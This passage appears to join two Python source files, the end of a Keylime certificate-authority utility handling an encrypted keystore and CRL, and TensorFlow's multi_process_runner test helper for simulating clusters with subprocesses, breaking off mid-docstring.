# send back the CRL
self.send_response(200)
self.end_headers()
self.wfile.write(self.server.published_crl)
def rmfiles(path):
files = glob.glob(path)
for f in files:
os.remove(f)
def write_private(inp):
priv = inp[0]
salt = inp[1]
priv_encoded = yaml.dump(priv, Dumper=SafeDumper)
key = crypto.kdf(global_password, salt)
ciphertext = crypto.encrypt(priv_encoded, key)
towrite = {'salt': salt, 'priv': ciphertext}
with os.fdopen(os.open('private.yml', os.O_WRONLY | os.O_CREAT, 0o600), 'w', encoding="utf-8") as f:
yaml.dump(towrite, f, Dumper=SafeDumper)
def read_private(warn=False):
if global_password is None:
setpassword(getpass.getpass(
"Please enter the password to decrypt your keystore: "))
if os.path.exists('private.yml'):
with open('private.yml', encoding="utf-8") as f:
toread = yaml.load(f, Loader=SafeLoader)
key = crypto.kdf(global_password, toread['salt'])
try:
plain = crypto.decrypt(toread['priv'], key)
except ValueError as e:
raise Exception("Invalid password for keystore") from e
return yaml.load(plain, Loader=SafeLoader), toread['salt']
if warn:
# file doesn't exist, just invent a salt
logger.warning("Private certificate data %s does not exist yet.",
os.path.abspath("private.yml"))
logger.warning(
"Keylime will attempt to load private certificate data again when it is needed.")
return {'revoked_keys': []}, base64.b64encode(crypto.generate_random_key()).decode()
def main(argv=sys.argv): #pylint: disable=dangerous-default-value
parser = argparse.ArgumentParser(argv[0])
parser.add_argument('-c', '--command', action='store', dest='command',
required=True, help="valid commands are init,create,pkg,revoke,listen")
parser.add_argument('-n', '--name', action='store',
help='the common name of the certificate to create')
parser.add_argument('-d', '--dir', action='store',
help='use a custom directory to store certificates and keys')
parser.add_argument('-i', '--insecure', action='store_true', default=False,
help='create cert packages with unprotected private keys and write them to disk. USE WITH CAUTION!')
args = parser.parse_args(argv[1:])
if args.dir is None:
if os.getuid() != 0 and config.REQUIRE_ROOT:
logger.error(
"If you don't specify a working directory, this process must be run as root to access %s", config.WORK_DIR)
sys.exit(-1)
workingdir = config.CA_WORK_DIR
else:
workingdir = args.dir
# set a conservative general umask
os.umask(0o077)
if args.command == 'init':
cmd_init(workingdir)
elif args.command == 'create':
if args.name is None:
logger.error(
"you must pass in a name for the certificate using -n (or --name)")
parser.print_help()
sys.exit(-1)
cmd_mkcert(workingdir, args.name)
elif args.command == 'pkg':
if args.name is None:
logger.error(
"you must pass in a name for the certificate using -n (or --name)")
parser.print_help()
sys.exit(-1)
cmd_certpkg(workingdir, args.name, args.insecure)
elif args.command == 'revoke':
if args.name is None:
logger.error(
"you must pass in a name for the certificate using -n (or --name)")
parser.print_help()
sys.exit(-1)
cmd_revoke(workingdir, args.name)
elif args.command == 'listen':
if args.name is None:
args.name = os.path.join(workingdir, 'RevocationNotifier-cert.crt')
logger.warning("using default name for revocation cert %s",
args.name)
cmd_listen(workingdir, args.name)
else:
logger.error("Invalid command: %s", args.command)
parser.print_help()
sys.exit(-1)
|
multi_process_runner.py
|
# Lint as: python3
# Copyright 2019 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Multi-process runner for testing purpose."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import atexit
import collections
import contextlib
import json
import os
import signal
import sys
import threading
import time
import unittest
import weakref
from absl import logging
import six
from six.moves import queue as Queue
from tensorflow.python import tf2
from tensorflow.python.compat import v2_compat
from tensorflow.python.distribute import multi_process_lib
from tensorflow.python.eager import context
multiprocessing = multi_process_lib.multiprocessing
# pylint: disable=g-import-not-at-top
try:
# `faulthandler` is not available in py2.
import faulthandler
except ImportError:
faulthandler = None
# TODO(b/150264776): Remove after resolving CI issue.
try:
import dill
except ImportError:
dill = None
# TODO(b/150264776): Remove after resolving CI issue.
try:
import tblib.pickling_support
# For pickling traceback objects.
tblib.pickling_support.install()
except ImportError:
pass
# _ProcessStatusInfo contains process status information. When is_successful
# attribute is True, the subprocess has ended successfully, or if False, the
# exception stack trace info is stored in exc_info to pass on to parent process
# to be re-raised.
_ProcessStatusInfo = collections.namedtuple(
'_ProcessStatusInfo',
['task_type', 'task_id', 'is_successful', 'exc_info', 'return_value'])
# Information returned from a successful MultiProcessRunner run.
MultiProcessRunnerResult = collections.namedtuple('MultiProcessRunnerResult',
['return_value', 'stdout'])
TestEnvironment = collections.namedtuple('TestEnvironment', [
'task_type', 'task_id', 'cluster_spec', 'rpc_layer', 'grpc_fail_fast',
'v2_enabled', 'executing_eagerly'
])
# Resources for communication between worker processes and the main process.
#
# `process_status_queue` is used by `multi_process_runner` internally for
# communication from subprocesses to the parent process for whether it's been
# successful, and if not what the error stack trace is.
# `parent_to_sub_queue` is used for communications from parent to subprocess.
# Currently this is only used to terminate subprocesses.
# TODO(rchao): Remove this once subprocess is terminated by SIGKILL.
# `streaming_pipe_w` is to stream stdout and stderr from subprocesses to parent
# process.
# `barrier` is a barrier for the party of all subprocesses.
Resources = collections.namedtuple('Resources', [
'process_status_queue', 'parent_to_sub_queue', 'streaming_pipe_w', 'barrier'
])
# Default time out sec is selected so that it's handled before the default
# "medium" timeout of the test runs.
_DEFAULT_TIMEOUT_SEC = 200
# The timeout in seconds to wait to force kill a child process. When a child
# process times out we first try to SIGTERM it so that it has a chance to dump
# stacktraces. However dumping stacktrace can take a long time.
_FORCE_KILL_WAIT_SEC = 30
class MultiProcessRunner(object):
"""A utility class to start multiple processes to simulate a cluster.
We need to use multiple processes to simulate a cluster in TF 2.0 tests
because TF 2.0 has some process-global data structures that have to be
separated by processes. We also need child processes to test out our fault
tolerance because shutting down a standard TensorFlow server within its
process is not supported.
Note: the main test program that uses this runner class must run main program
via `test_main` defined in this file. Using this runner in non-test binaries
is not supported yet.
This class is not thread-safe. Child processes will inherit TF2 behavior flag.
"""
def __init__(self,
proc_func,
cluster_spec,
rpc_layer=None,
max_run_time=None,
grpc_fail_fast=None,
stream_stdout=True,
list_stdout=False,
use_dill_for_args=True,
daemon=False,
dependence_on_chief=True,
auto_restart=False,
args=None,
kwargs=None):
"""Creates a multi-process runner.
Args:
proc_func: Function to be run on child processes. This will be run on
processes for all task types.
cluster_spec: Dict for cluster spec. The following is an example of
cluster with three workers and two ps's.
{"worker": ["worker0.example.com:2222",
"worker1.example.com:2222",
"worker2.example.com:2222"],
"ps": ["ps0.example.com:2222",
"ps1.example.com:2222"]}
rpc_layer: RPC layer to use. Default value is 'grpc'.
max_run_time: If set, child processes is forced to exit at approximately
this many seconds after `start` is called. We achieve this through
`signal.alarm()` api. Note that this is best effort at Python level
since Python signal handler does not get executed when it runs lower
level C/C++ code. So it can be delayed for arbitrarily long time.
If any of the child process is still running when `max_run_time` is up,
they will be force-terminated and a `UnexpectedSubprocessExitError`
may be raised at `join()`.
grpc_fail_fast: Whether GRPC connection between processes should fail
without retrying. Defaults to None, in which case the environment
variable is not explicitly set.
stream_stdout: True if the output/error from the subprocesses should be
streamed to be printed in parent process' log. Defaults to True.
list_stdout: True if the output/error from the subprocesses should be
collected to be attached to the resulting `MultiProcessRunnerResult`
returned from `MultiProcessRunner.join()`. If True, the list of stdout
can be retrieved via `MultiProcessRunnerResult.stdout` attribute.
Defaults to False.
use_dill_for_args: Whether to use dill to pickle `args` and `kwargs`. dill
can pickle more objects, but doesn't work with types in
`multiprocessing` library like `Mutex`.
daemon: Whether to start processes as daemons.
dependence_on_chief: Whether to terminates the cluster if the chief exits.
If auto_restart is True, it only terminates the cluster if the chief
exits with a zero exit code.
auto_restart: Whether to automatically restart processes that exit with
non-zero exit code.
args: Positional arguments to be sent to functions run on processes.
kwargs: Keyword arguments to be sent to functions run on processes.
Raises:
RuntimeError: if `multi_process_runner.test_main()` is not called.
ValueError: if there are more than one chief in the `cluster_spec`.
"""
assert cluster_spec is not None
if 'chief' in cluster_spec and len(cluster_spec['chief']) > 1:
raise ValueError('If chief exists in the cluster, there must be at most '
'one chief. Current `cluster_spec` has {} chiefs.'
.format(len(cluster_spec['chief'])))
if not multi_process_lib.initialized():
raise MultiProcessRunnerNotInitializedError(
'`multi_process_runner` is not initialized. '
'Please call `multi_process_runner.test_main()` '
'within `if __name__ == \'__main__\':` block '
'in your python module to properly initialize '
'`multi_process_runner`.')
if not callable(proc_func):
raise ValueError('proc_func is not a callable')
self._proc_func = proc_func
self._cluster_spec = cluster_spec
self._rpc_layer = rpc_layer or 'grpc'
self._max_run_time = max_run_time
self._grpc_fail_fast = grpc_fail_fast
self._stream_stdout = stream_stdout
# TODO(rchao): Revisit list_stdout argument to consider other solution.
self._list_stdout = list_stdout
self._dependence_on_chief = dependence_on_chief
self._use_dill_for_args = use_dill_for_args
self._daemon = daemon
self._auto_restart = auto_restart
self._args = args or ()
self._kwargs = kwargs or {}
# Child processes should have the same v2 and eager behavior.
self._v2_enabled = tf2.enabled()
self._executing_eagerly = context.executing_eagerly()
self._joined = False
self._process_lock = threading.Lock()
# Guarded by self._process_lock.
self._processes = {}
# Record which processes are terminated. Due to a bug in Python<3.7,
# terminated processes return 255 exit code, which should cause an exception
# in join().
# https://bugs.python.org/issue30589
# Guarded by self._process_lock.
self._terminated = set()
self._reading_threads = []
self._manager = manager()
self._process_status_queue = self._manager.Queue()
self._parent_to_sub_queue = self._manager.Queue()
parties = sum(len(addresses) for addresses in self._cluster_spec.values())
self._barrier = self._manager.Barrier(parties)
# We use a queue to collect outputs from worker processes since it's thread
# safe.
self._streaming_queue = self._manager.Queue()
self._watchdog_thread = None
def set_args(self, args=None, kwargs=None):
self._args = args or self._args
self._kwargs = kwargs or self._kwargs
def _continuously_readline_from_sub(self, pipe_r, task_type, task_id):
"""Function to continuously read lines from subprocesses."""
with os.fdopen(pipe_r.fileno(), 'r', closefd=False) as reader:
for line in reader:
task_string = '[{}-{}]:'.format(task_type, task_id)
formatted_line = '{} {}'.format(task_string.ljust(14), line)
if self._stream_stdout:
# TODO(rchao): Use a lock here to ensure the printed lines are not
# broken.
print(formatted_line, end='', flush=True)
if self._list_stdout:
self._streaming_queue.put(formatted_line)
def _start_subprocess_and_reading_thread(self,
task_type,
task_id,
cluster_spec=None,
proc_func=None,
args=None,
kwargs=None):
"""Start a subprocess and a thread the reads lines from the subprocess."""
if dill is None:
raise unittest.SkipTest(
'TODO(b/150264776): Resolve dependency issue in CI')
test_env = TestEnvironment(
task_type=task_type,
task_id=task_id,
cluster_spec=cluster_spec or self._cluster_spec,
rpc_layer=self._rpc_layer,
grpc_fail_fast=self._grpc_fail_fast,
v2_enabled=self._v2_enabled,
executing_eagerly=self._executing_eagerly,
)
pipe_r, pipe_w = multiprocessing.Pipe(duplex=False)
resources = Resources(
process_status_queue=self._process_status_queue,
parent_to_sub_queue=self._parent_to_sub_queue,
streaming_pipe_w=pipe_w,
barrier=self._barrier,
)
if proc_func is None:
proc_func, args, kwargs = self._proc_func, self._args, self._kwargs
# Always use dill to pickle proc_func so that we support more callable
# types, e.g. lambda.
proc_func = dill.dumps(proc_func, dill.HIGHEST_PROTOCOL)
if self._use_dill_for_args:
args = dill.dumps(args, dill.HIGHEST_PROTOCOL)
kwargs = dill.dumps(kwargs, dill.HIGHEST_PROTOCOL)
p = _Process(
test_env=test_env,
target=_ProcFunc(),
args=(resources, test_env, proc_func, args, kwargs,
self._use_dill_for_args),
daemon=self._daemon)
p.start()
self._processes[(task_type, task_id)] = p
self._terminated.discard((task_type, task_id))
# For each subprocess, we dedicate a thread continuously reading lines
# from them.
thread = threading.Thread( # pylint: disable=unexpected-keyword-arg
target=self._continuously_readline_from_sub,
args=(pipe_r, task_type, task_id))
thread.start()
self._reading_threads.append(thread)
if self._watchdog_thread is None or not self._watchdog_thread.is_alive():
self._watchdog_thread = threading.Thread(target=self._process_watchdog)
self._watchdog_thread.start()
def start(self):
"""Starts processes, one for each task in `cluster_spec`.
Note that this is best effort by the applicable multiprocessing library,
and it may take up to seconds for a subprocess to be successfully started.
"""
with self._process_lock:
if self._processes:
raise ValueError('MultiProcessRunner already started.')
if self._joined:
raise ValueError('cannot start new processes after'
'MultiProcessRunner.join() is called')
for task_type, addresses in self._cluster_spec.items():
for task_id, _ in enumerate(addresses):
self._start_subprocess_and_reading_thread(task_type, task_id)
# TODO(rchao): Remove the need of using SIGALRM if possible. At this time,
# without this the tests become very flaky.
if self._max_run_time is not None:
def handler(signum, frame):
del signum, frame
self.terminate_all()
signal.signal(signal.SIGALRM, handler)
signal.alarm(self._max_run_time)
def start_in_process_as(self, as_task_type, as_task_id):
"""Start the processes, with the specified task run in main process.
This is similar to `start()` except that the task with task_type
`as_task_type` and task_id `as_task_id` is run in the main process.
This method is particularly useful when debugging tool such as `pdb` is
needed in some specific task. Note that since this method is blocking until
that specific task exits, additional actions would need a thread to be
called:
```python
def proc_func():
# user code to be run
import pdb; pdb.set_trace()
def follow_ups():
time.sleep(5)
mpr.start_single_process(
task_type='evaluator',
task_id=0)
mpr = multi_process_runner.MultiProcessRunner(
proc_func,
multi_worker_test_base.create_cluster_spec(
has_chief=True, num_workers=1))
threading.Thread(target=follow_ups).start()
mpr.start_in_process_as(as_task_type='chief', as_task_id=0)
mpr.join()
```
Note that if `list_stdout=True`, the logs/stdout by task
run by the main process is not available in result.stdout.
Args:
as_task_type: The task type to be run in the main process.
as_task_id: The task id to be run in the main process.
"""
if self._processes:
raise ValueError('MultiProcessRunner already started.')
with self._process_lock:
if self._joined:
raise ValueError('cannot start new processes after'
'MultiProcessRunner.join() is called')
for task_type, addresses in self._cluster_spec.items():
for task_id, _ in enumerate(addresses):
if not (task_type == as_task_type and task_id == as_task_id):
self._start_subprocess_and_reading_thread(task_type, task_id)
_set_tf_config(as_task_type, as_task_id, self._cluster_spec,
self._rpc_layer)
self._proc_func(*self._args, **self._kwargs)
def start_single_process(self,
task_type,
task_id,
cluster_spec=None,
proc_func=None,
args=None,
kwargs=None):
"""Starts a single process.
This starts a process in the cluster with the task type, task id, and the
process function (`proc_func`). If process function is `None`, the function
provided at `__init__` will be used. If `cluster_spec` is `None`, the
cluster spec provided at `__init__` will be used.
TODO(rchao): It is meant that all subprocesses will be updated with the new
cluster spec, but this has yet to be implemented. At this time only the
newly started subprocess picks up this updated cluster spec.
Args:
task_type: The task type.
task_id: The task id.
cluster_spec: The cluster spec to be used on the newly started
process. If `None`, the cluster spec provided at `__init__` will be
used.
proc_func: The process function to be run on the newly started
process. If specified, specify `args` and `kwargs` as well. If `None`,
the function provided at `__init__` will be used.
args: Optional positional arguments to be supplied in `proc_func`.
kwargs: Optional keyword arguments to be supplied in `proc_func`.
"""
with self._process_lock:
if self._joined:
raise ValueError('cannot start new processes after'
'MultiProcessRunner.join() is called')
self._start_subprocess_and_reading_thread(
task_type,
task_id,
cluster_spec=cluster_spec,
proc_func=proc_func,
args=args or (),
kwargs=kwargs or {})
def _queue_to_list(self, queue_to_convert):
"""Convert `queue.Queue` to `list`."""
list_to_return = []
# Calling `queue.empty()` is not reliable.
while True:
try:
list_to_return.append(queue_to_convert.get(block=False))
except Queue.Empty:
break
return list_to_return
def _get_process_statuses(self):
# One worker may have multiple statuses. We only keep the last one.
statuses = {}
for status in self._queue_to_list(self._process_status_queue):
statuses[(status.task_type, status.task_id)] = status
return statuses
def get_process_id(self, task_type, task_id):
"""Returns the subprocess id given the task type and task id."""
with self._process_lock:
p = self._processes.get((task_type, task_id), None)
return p.pid if p else None
def get_process_exit_code(self, task_type, task_id):
"""Returns the subprocess exit code given the task type and task id.
Args:
task_type: The task type.
task_id: The task id.
Returns:
The subprocess exit code; `None` if the subprocess has not exited yet.
Raises:
KeyError: If the corresponding subprocess is not found with `task_type`
and `task_id`.
"""
with self._process_lock:
p = self._processes[(task_type, task_id)]
return p.exitcode if p else None
def process_exists(self, task_type, task_id):
"""Returns whether the subprocess still exists given the task type and id.
Args:
task_type: The task type.
task_id: The task id.
Returns:
Boolean; whether the subprocess still exists. If the subprocess has
exited, this returns False.
"""
return self.get_process_exit_code(task_type, task_id) is None
def _process_watchdog(self):
"""Simulates a cluster management system.
- If auto_restart is True, it restarts processes that exit with a non-zero
exit code. Note that when join() times out it overrides auto_restart to
False.
- If dependence_on_chief is True, it terminates all processes once the chief
exits. If auto_restart is also True, it only terminates all processes if
the chief exit with a zero exit code, otherwise it restarts the chief.
This runs in self._watchdog_thread.
"""
while True:
time.sleep(1)
with self._process_lock:
chief = self._processes.get(('chief', 0), None)
# Terminate the cluster when _dependence_on_chief is True if either:
# - chief has exited with zero exit code.
# - chief has exited with non-zero exit code and self._auto_restart is
# False.
if chief and self._dependence_on_chief and chief.exitcode is not None:
if chief.exitcode == 0 or (not self._auto_restart):
for p in self._processes.values():
# Give other processes a chance to exit on their own.
p.join(timeout=3)
self._terminate_all()
for p in self._processes.values():
p.join()
return
# Auto restart failed processes if self._auto_restart is True.
if self._auto_restart:
has_failure = False
for (task_type, task_id), p in self._processes.items():
if p.exitcode is not None and p.exitcode != 0:
has_failure = True
logging.info('Restarting failed %s-%d', task_type, task_id)
self._start_subprocess_and_reading_thread(task_type, task_id)
if has_failure:
continue
# Exit the thread if all processes have exited at this point.
if all(p.exitcode is not None for p in self._processes.values()):
return
def _reraise_if_subprocess_error(self, process_statuses):
for process_status in process_statuses.values():
assert isinstance(process_status, _ProcessStatusInfo)
if not process_status.is_successful:
process_status.exc_info[1].mpr_result = self._get_mpr_result(
process_statuses)
six.reraise(*process_status.exc_info)
def join(self, timeout=_DEFAULT_TIMEOUT_SEC):
"""Joins all the processes with timeout.
If any of the subprocesses does not exit approximately after `timeout`
seconds has passed after `join` call, this raises a
`SubprocessTimeoutError`.
Note: At timeout, it uses SIGTERM to terminate the subprocesses, in order to
log the stack traces of the subprocesses when they exit. However, this
results in timeout when the test runs with tsan (thread sanitizer); if tsan
is being run on the test targets that rely on timeout to assert information,
`MultiProcessRunner.terminate_all()` must be called after `join()`, before
the test exits, so the subprocesses are terminated with SIGKILL, and data
race is removed.
Args:
timeout: optional integer or `None`. If provided as an integer, and not
all processes report status within roughly `timeout` seconds, a
`SubprocessTimeoutError` exception will be raised. If `None`, `join` never
times out.
Returns:
A MultiProcessRunnerResult object, which has two attributes,
`return_value` and `stdout`. `return_value` always contains the return
values from the subprocesses. If `list_stdout` argument is True at
`__init__`, `stdout` is available that contains a list of all messages
from subprocesses' stdout and stderr.
Raises:
SubprocessTimeoutError: if not all processes report status approximately
within `timeout` seconds. When this is raised, a
`MultiProcessRunnerResult` object can be retrieved by
`SubprocessTimeoutError`'s mpr_result attribute, which has the same
structure as above 'Returns' section describes.
UnexpectedSubprocessExitError: If any of the subprocesses did not exit
properly (for example, they exit on SIGTERM or SIGKILL signal). When
this is raised, a `MultiProcessRunnerResult` object can be retrieved by
`UnexpectedSubprocessExitError`'s mpr_result attribute, which has the
same structure as above 'Returns' section describes. If `max_run_time`
is not `None`, it is expected that some subprocesses may be
force-killed when `max_run_time` is up, and this is raised in those
cases.
Exception: if there is an Exception propagated from any subprocess. When
this is raised, a `MultiProcessRunnerResult` object can be retrieved by
`UnexpectedSubprocessExitError`'s mpr_result attribute, which has the
same structure as above 'Returns' section describes.
"""
if timeout and not isinstance(timeout, int):
raise ValueError('`timeout` must be an integer or `None`.')
with self._process_lock:
if self._joined:
raise ValueError("MultiProcessRunner can't be joined twice.")
self._joined = True
self._watchdog_thread.join(timeout)
if self._watchdog_thread.is_alive():
# Timeout. Force termination to dump worker processes stack trace.
with self._process_lock:
self._auto_restart = False
logging.error('Timeout when joining for child processes. Terminating...')
self.terminate_all(sig=signal.SIGTERM)
# Wait for the processes to terminate by themselves first, so they have a
# chance to dump stacktraces. After _FORCE_KILL_WAIT_SEC, we SIGKILL them.
self._watchdog_thread.join(_FORCE_KILL_WAIT_SEC)
if self._watchdog_thread.is_alive():
logging.error('Timeout when waiting for child processes to '
'print stacktrace. Sending SIGKILL...')
self.terminate_all()
self._watchdog_thread.join()
process_statuses = self._get_process_statuses()
self._reraise_if_subprocess_error(process_statuses)
raise SubprocessTimeoutError(
'One or more subprocesses timed out, where timeout was set to {}s. '
'Please change the `timeout` argument for '
'`MultiProcessRunner.join()` or `multi_process_runner.run()` '
'if it should be adjusted.'.format(timeout),
self._get_mpr_result(process_statuses))
for (task_type, task_id), p in self._processes.items():
logging.info('%s-%d exit code: %s', task_type, task_id, p.exitcode)
process_statuses = self._get_process_statuses()
self._reraise_if_subprocess_error(process_statuses)
# Checking all the processes that are expected to exit properly.
for (task_type, task_id), p in self._processes.items():
# Successfully exiting process has exit code 0. We ignore processes that
# are terminated.
assert p.exitcode is not None
if (p.exitcode > 0 and (task_type, task_id) not in self._terminated):
raise UnexpectedSubprocessExitError(
'Subprocess %s-%d exited with exit code %s. See logs for details.'
% (task_type, task_id, p.exitcode),
self._get_mpr_result(process_statuses))
logging.info('Joining log reading threads.')
for thread in self._reading_threads:
thread.join()
logging.info('Joined log reading threads.')
# Clear the alarm.
signal.alarm(0)
return self._get_mpr_result(process_statuses)
def _get_mpr_result(self, process_statuses):
stdout = self._queue_to_list(self._streaming_queue)
return_values = []
for process_status in process_statuses.values():
if process_status.return_value is not None:
return_values.append(process_status.return_value)
return MultiProcessRunnerResult(stdout=stdout, return_value=return_values)
def terminate(self, task_type, task_id):
"""Terminates the process with `task_type` and `task_id`.
If auto_retart=True, the terminated task will be restarted unless the chief
has already exited with zero exit code.
Args:
task_type: the task type.
task_id: the task id.
"""
with self._process_lock:
p = self._processes.get((task_type, task_id), None)
if p is None:
raise ValueError('{}-{} does not exist'.format(task_type, task_id))
self._terminated.add((task_type, task_id))
# TODO(crccw): change to use Process.terminate() as well.
self._parent_to_sub_queue.put('terminate {} {}'.format(
task_type, task_id))
p.join()
def _terminate_all(self, sig=None):
"""Terminates all subprocesses.
The caller is required to hold self._process_lock.
Args:
sig: the signal used to terminate the process. The default is SIGKILL.
"""
# Use SIGKILL as default. In systems where that's unavailable such as
# windows, use SIGTERM.
sig = sig or getattr(signal, 'SIGKILL', signal.SIGTERM)
for (task_type, task_id), p in self._processes.items():
if p.exitcode is not None:
continue
try:
os.kill(p.pid, sig)
self._terminated.add((task_type, task_id))
logging.info('%s-%d terminated with signal %r.', task_type, task_id,
sig)
except ProcessLookupError:
logging.info('Attempting to kill %s-%d but it does not exist.',
task_type, task_id)
def terminate_all(self, sig=None):
"""Terminates all subprocesses."""
with self._process_lock:
self._terminate_all(sig)
class _Process(multi_process_lib.Process):
"""A modified `multiprocessing.Process` that can set up environment variables."""
# TODO(crccw): consider moving other logics in _ProcFunc to _Process.
def __init__(self, test_env, **kwargs):
super(_Process, self).__init__(**kwargs)
self._test_env = test_env
self._actual_run = getattr(self, 'run')
self.run = self._run_with_setenv
def _run_with_setenv(self):
# We need to set environment variables before doing anything because
# setenv() is not thread-safe.
test_env = self._test_env
if test_env.grpc_fail_fast is not None:
os.environ['GRPC_FAIL_FAST'] = str(test_env.grpc_fail_fast)
_set_tf_config(test_env.task_type, test_env.task_id, test_env.cluster_spec,
test_env.rpc_layer)
return self._actual_run()
class _ProcFunc(object):
"""Represents a callable to run in a subprocess."""
@contextlib.contextmanager
def _runtime_mode(self, executing_eagerly):
if executing_eagerly:
with context.eager_mode():
yield
else:
with context.graph_mode():
yield
def _message_checking_func(self, task_type, task_id):
"""A function that regularly checks messages from parent process."""
# TODO(rchao): Remove this once parent uses SIGKILL to terminate subprocess.
while True:
try:
message = self._resources.parent_to_sub_queue.get(block=False)
# Currently the only possible message is termination.
if not message.startswith('terminate'):
raise ValueError('Unrecognized message: {}'.format(message))
if message == 'terminate {} {}'.format(task_type, task_id):
break
else:
# If the message is not targeting this process, put it back to the
# queue.
self._resources.parent_to_sub_queue.put(message)
time.sleep(1)
except Queue.Empty:
time.sleep(0.1)
self._resources.process_status_queue.put(
_ProcessStatusInfo(
task_type=task_type,
task_id=task_id,
is_successful=True,
exc_info=None,
return_value=None))
# `os._exit(1)` is used to more reliably terminate a subprocess.
os._exit(1) # pylint: disable=protected-access
def _close_streaming(self):
"""Close stdout, stderr and streaming pipe.
We need to explicitly close them since Tensorflow may take a while to exit,
so that the reading threads in the main process can exit more quickly.
"""
sys.stdout.flush()
sys.stderr.flush()
sys.stdout.close()
sys.stderr.close()
self._resources.streaming_pipe_w.close()
def __call__(self, resources, test_env, proc_func, args, kwargs,
use_dill_for_args):
"""The wrapper function that actually gets run in child process(es)."""
global _barrier
self._resources = resources
_barrier = self._resources.barrier
proc_func = dill.loads(proc_func)
if use_dill_for_args:
args = dill.loads(args)
kwargs = dill.loads(kwargs)
if faulthandler is not None:
faulthandler.enable()
faulthandler.register(signal.SIGTERM, chain=True)
# All logging should go to stderr to be streamed to the main process.
logging.set_stderrthreshold(logging.DEBUG)
# Assign sys.stdout and sys.stderr as duplicates of `streaming_pipe_w` so
# print() and logging.*() write directly to `streaming_pipe_w`.
# Unfortunately since we cannot prepend task_type and task_id information to
# the streamed logs we will need a thread per subprocess to distinguish
# where the piece of message is from.
os.dup2(resources.streaming_pipe_w.fileno(), sys.stdout.fileno())
os.dup2(resources.streaming_pipe_w.fileno(), sys.stderr.fileno())
pid = os.getpid()
logging.info('Subprocess with PID %d (%s, %d) is now being started.', pid,
test_env.task_type, test_env.task_id)
# The thread will be dedicated to checking messages from the parent process.
threading.Thread( # pylint: disable=unexpected-keyword-arg
target=self._message_checking_func,
args=(test_env.task_type, test_env.task_id),
daemon=True).start()
if test_env.v2_enabled:
v2_compat.enable_v2_behavior()
with self._runtime_mode(test_env.executing_eagerly):
info = _run_contained(test_env.task_type, test_env.task_id, proc_func,
args, kwargs)
self._resources.process_status_queue.put(info)
# Re-raise the exception in addition to reporting it to the parent
# process, so that even if `--test_timeout` flag is set and the
# error doesn't make it to be shown in parent process before bazel's
# timeout, the log would still show what happens in this subprocess,
# instead of silently suppressing the error due to early bazel
# timeout. Raising an error in the subprocess produces stack trace in
# the log, but the program continues running.
if not info.is_successful:
six.reraise(*info.exc_info)
self._close_streaming()
# Exit with code 0 as it's considered successful exit at this point.
sys.exit(0)
# Active MultiProcessPoolRunner. We need to shut them down when the program
# exits. For the main process, we do this via atexit callback. For a process
# that is spawned by MultiProcessPoolRunner, e.g. nested MultiProcessPoolRunner,
# we do this manually at the end of _pool_runner_worker. The reason is that
# multiprocessing library waits for all spawned processes to exit, so atexit
# callbacks won't trigger until all pools are shutdown.
_active_pool_runners = weakref.WeakSet()
def _shutdown_all_pool_runners():
for pool in _active_pool_runners:
pool.shutdown()
class MultiProcessPoolRunner(object):
"""A utility class to start a process pool to simulate a cluster.
It's similar to MultiProcessRunner, but uses a pool of processes to avoid the
expensive initialization cost of Tensorflow.
"""
def __init__(self, cluster_spec, initializer=None):
"""Creates a multi-process pool runner.
Args:
cluster_spec: Dict for cluster spec. The following is an example of
cluster with three workers.
{"worker": ["worker0.example.com:2222",
"worker1.example.com:2222",
"worker2.example.com:2222"]}
initializer: a callable to called at the startup of worker processes.
Raises:
RuntimeError: if `multi_process_runner.test_main()` is not called.
ValueError: if there are more than one chief in the `cluster_spec`.
"""
_active_pool_runners.add(self)
self._cluster_spec = cluster_spec
self._initializer = initializer
self._conn = {}
self._runner = None
def __del__(self):
self.shutdown()
def shutdown(self):
"""Shuts down the worker pool."""
for conn in self._conn.values():
conn.close()
self._conn = {}
if self._runner is not None:
try:
self._runner.join()
except Exception as e: # pylint: disable=broad-except
logging.error(
'Ignoring exception when shutting down MultiProcessPoolRunner: %s',
e)
self._runner = None
def _start(self):
"""Starts the worker pool."""
# We need different arguments for different processes so we're passing a
# no-op proc_func here and use start_single_process instead.
if dill is None:
raise unittest.SkipTest(
'TODO(b/150264776): Resolve dependency issue in CI')
self._runner = MultiProcessRunner(
proc_func=lambda: None,
cluster_spec=self._cluster_spec,
use_dill_for_args=False)
if self._initializer:
initializer = dill.dumps(self._initializer, dill.HIGHEST_PROTOCOL)
else:
initializer = None
for task_type, addresses in self._cluster_spec.items():
for task_id, _ in enumerate(addresses):
conn1, conn2 = multiprocessing.Pipe(duplex=True)
self._conn[(task_type, task_id)] = conn1
self._runner.start_single_process(
task_type,
task_id,
proc_func=_pool_runner_worker,
args=(task_type, task_id, initializer, conn2))
# In the case MultiProcessPoolRunner is not GC-ed, we register an atexit
# callback to shut them down. For example, when there're global
# MultiProcessPoolRunner.
atexit.register(_shutdown_all_pool_runners)
def run(self, proc_func, args=None, kwargs=None):
"""Runs `proc_func` with `args` and `kwargs` on all jobs.
Args:
proc_func: The function to be run.
args: Optional positional arguments to be supplied in `proc_func`.
kwargs: Optional keyword arguments to be supplied in `proc_func`.
Returns:
A list of return values.
"""
# TODO(b/150264776): skip in OSS until it's implemented.
multi_process_lib.Process()
if self._runner is None:
self._start()
proc_func = dill.dumps(proc_func, dill.HIGHEST_PROTOCOL)
for conn in self._conn.values():
conn.send((proc_func, args or [], kwargs or {}))
process_statuses = []
for (task_type, task_id), conn in self._conn.items():
logging.info('Waiting for the result from %s-%d', task_type, task_id)
try:
process_statuses.append(conn.recv())
except EOFError:
# This shouldn't happen due to exceptions in proc_func. This usually
# means bugs in the runner.
self.shutdown()
raise RuntimeError('Unexpected EOF. Worker process may have died. '
'Please report a bug')
return_values = []
for process_status in process_statuses:
assert isinstance(process_status, _ProcessStatusInfo)
if not process_status.is_successful:
six.reraise(*process_status.exc_info)
if process_status.return_value is not None:
return_values.append(process_status.return_value)
return return_values
def _pool_runner_worker(task_type, task_id, initializer, conn):
"""Function that runs on the workers in a pool.
It listens for callables to run and returns the result until `conn` is closed.
It captures the exceptions during executing the callable and return it through
`conn`.
Args:
task_type: the task type.
